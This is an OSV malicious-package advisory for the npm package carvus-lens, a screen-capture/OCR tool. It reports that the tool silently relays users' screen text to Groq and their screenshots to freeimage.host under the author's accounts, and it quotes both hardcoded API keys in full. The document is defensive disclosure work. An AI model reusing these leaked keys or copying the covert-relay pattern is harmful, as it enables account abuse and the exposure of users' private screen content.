MAL-2026-4505

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/carvus-lens/MAL-2026-4505.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4505
Published
2026-05-20T01:31:25Z
Modified
2026-05-26T06:02:17.019212348Z
Summary
Malicious code in carvus-lens (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (be2182b552b0a8359f3314078d48310cfcd57738e1934aacf00ac8775a32cfe0)

carvus-lens is a screen-capture/OCR Electron-style tool whose advertised 'Ask AI', 'Translate', and 'Search' features silently route user-selected screen content to two third-party services chosen by the author, not the user. render.js line 4 hardcodes GROQ_API_KEY = "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" and the queryGroq function POSTs OCR'd text to https://api.groq.com/openai/v1/chat/completions with Authorization: Bearer ${GROQ_API_KEY}, so every user's selected screen text flows into Groq under the author's account. render.js line 5 hardcodes IMG_HOST_KEY = "6d207e02198a847aa98d0a2a901485a5" and uploadImage POSTs cropped screenshots to https://freeimage.host/api/1/upload?key=${IMG_HOST_KEY} — screenshots may contain messages, documents, code, or banking content, are stored under the author's freeimage.host account, and are made publicly accessible (the resulting URL is then handed to lens.google.com). README does not disclose either intermediary. Two compounding issues: (1) silent-relay — normal use of the advertised API exfiltrates user screen content to author-chosen destinations the user never selected; (2) credential redistribution — both API keys are extractable from the shipped client code and can be abused by any installer to bill Groq usage against the author or upload arbitrary content to the author's freeimage.host account.

Database specific 
{
    "malicious-packages-origins": [
        {
            "sha256": "968a2b019b04b046715850d25dc90c586ba5b44f2fc6f7340ece0e29aaef3ec0",
            "versions": [
                "1.0.1"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T01:31:26Z",
            "id": "IN-MAL-2026-003363",
            "import_time": "2026-05-26T05:50:29.853645161Z"
        },
        {
            "sha256": "be2182b552b0a8359f3314078d48310cfcd57738e1934aacf00ac8775a32cfe0",
            "versions": [
                "1.0.1"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T01:31:25Z",
            "import_time": "2026-05-26T05:50:29.755053451Z",
            "id": "IN-MAL-2026-003362"
        }
    ]
}
References
Credits

Affected packages

npm / carvus-lens

Package

Name
carvus-lens
View open source insights on deps.dev
Purl
pkg:npm/carvus-lens

Affected ranges

Affected versions

1.*
1.0.1

Database specific

indicators 
{
    "package_integrity": [
        {
            "filename": "carvus-lens-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-yPwPZybRCC2+UaGCo55du9dVRsBMM6mfobnpKNsE/Sx6GEetUTRdbGqZJweep2NnjeTdDH0ugIUix2RIIh3Jhw==",
                "sha1": "5bed35dcada1d3b808d64ebdb73f6b82473f5355"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "e12697cb803002a86996658e7950e235e3cac99bf7ed93e27da0db86775ae1cc",
            "tlsh": "d1b2863a72b2093ef167d07e6b8b6118b9217003390eee08794c72448fdd99995f6bf5",
            "path": "render.js"
        }
    ],
    "domains": [
        "github.com",
        "release-assets.githubusercontent.com"
    ]
}
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/carvus-lens/MAL-2026-4505.json"
cwes 
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]